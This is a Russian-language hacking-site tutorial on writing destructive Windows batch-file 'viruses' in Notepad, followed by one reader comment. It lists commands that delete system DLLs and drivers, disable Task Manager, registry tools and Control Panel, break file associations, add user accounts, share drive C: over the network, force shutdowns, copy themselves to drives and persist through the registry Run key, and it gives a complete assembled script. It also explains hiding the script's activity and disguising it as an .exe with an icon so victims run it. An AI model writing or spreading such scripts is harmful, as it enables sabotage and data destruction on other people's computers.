V-zlom.ru » Статьи » Создание вирусов и троянов в блокноте

Создание вирусов и троянов в блокноте

Приступим:

 

1) Открываем блокнот;

2) Пишем в нем «mspaint», без кавычек;

3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;

4) Откроем файлик и увидим, что открылся Paint))

 

Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак:

 

 

Пишем в блокноте:

 

Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск Ф - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.

 

 

СПИСОК:

 

1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);

2) «label x:y» - переименовывает диск x на имя y (пример label C:Disc error);

3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);

4) «date x.y.z» - меняет дату на x день, y месяц, z год (пример date 16.11.05);

5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);

6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);

7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);

8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);

9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);

 

 

Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.

 

1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее.

 

2) Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.

 

 

 

 

(часть 2)

 

 

 

 

Приступим. Вы уже умеете создавать простенькие вирусы. Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. В этой части я научу вас некоторым тонкостям вирусописательсва.

Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво . Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR).

Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…».

В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было.

Теперь можно делать с вирусами что угодно. А что именно, решать уже вам.

 

 

 

 

 

(часть 3)

 

 

 

 

 

 

Привет, читатель. В этой части я буду давать советы по созданию твоих вирусов: как сделать их более сильными, точными и скрытыми. Приступим. Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

 

 

 

Готово? – спросите вы. Нет. Нужно его закончить. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:

 

 

 

Вот, теперь наш вирус готов. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования .bat в .exe, она работает намного лучше WinRAR'а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.

 

 

 

Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться, пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.

 

Итак, дальше поехали дальше:

 

 

Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает)) Можно использовать по несколько таких команд до полного торможения компьютера жертвы. Новый скрипт:

 

 

 

Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше))

 

 

Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас вы закончили базовый курс, от SMOKED'а, вирусо-писательства. Если же нет. Читаем все заново))

 

 

 

@echo off

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

time 0:00 >nul

date 13.06.23 >nul

label C:IDIOT >nul

label D:DURAK >nul

label E:SUKA >nul

label F:GANDON >nul

copy %0 C:\Open.bat >nul

copy %0 D:\Open.bat >nul

copy %0 E:\Open.bat >nul

copy %0 F:\Open.bat >nul

net user "Idiot you Hacked" /add >nul

net user "Bitch you Hacked" /add >nul

net user "Durak you Hacked" /add >nul

net user "Kritin you Hacked" /add >nul

net user "Gavno you Hacked" /add >nul

md 1 >nul

md 2 >nul

md 3 >nul

md 4 >nul

md 5 >nul

md 6 >nul

md 7 >nul

md 8 >nul

md 9 >nul

md 10 >nul

md 11 >nul

md 12 >nul

md 13 >nul

md 14 >nul

md 15 >nul

md 16 >nul

md 17 >nul

md 18 >nul

md 19 >nul

md 20 >nul

md 21 >nul

md 22 >nul

md 23 >nul

md 24 >nul

md 25 >nul

md 26 >nul

md 27 >nul

assoc .lnk=.txt >nul

assoc .exe=.txt >nul

:x ;

Start mspaint

goto x ;

:x ;

Start Calc

goto x ;

copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul

 

del %0 >nul

 

 

 

 

(часть 4)

 

 

 

 

 

В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только. Начнём мы с создания так называемых ВАТ-файлов или просто bat’ников, для этого нам понадобится всего лишь стандартный Блокнот Windows.

Создаём файл *.txt и открываем его. Теперь нам нужно забить в него определённые команды, примеры которых вы видите ниже:

 

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del

 

del "%SystemRoot%system32*.dll" /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)

 

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере

 

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

 

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений

 

time 0:00 >nul – Поставить время на 00:00

 

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

 

del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши

 

del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows

 

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления

 

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

 

shutdown -r -t 1 -c "lol" -f >nul – Форсираванная перезагрузка ПК

 

shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК

 

taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe

 

net share "ResName"="C:" >nul – Расшарить диск C:

 

label C:Диск >nul – Переименовать диск С:

 

msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК

 

del "%0" >nul – Самоликвидация вируса

 

 

А теперь комментарии. Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt.

Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Также получившийся вирус может самоуничтожаться, для этого вместо пути к целевому файлу нужно ввести %0.

Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение.

Команда time просто устанавливает любое время на часах ПК. Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя.

Команда

taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением.

Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью.

Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название.

Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды.

Теперь, когда вы записали необходимые вам команды, сохраните созданный *.txt с расширением *.bat

  • Автор: admin
  • Комментарии: 1
  • Просмотры: 21677
1

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!
  • Написал: Muha007
  • Комментарии: 6
  • 8 сентября 2016 17:30
Время не меняется и дата тоже?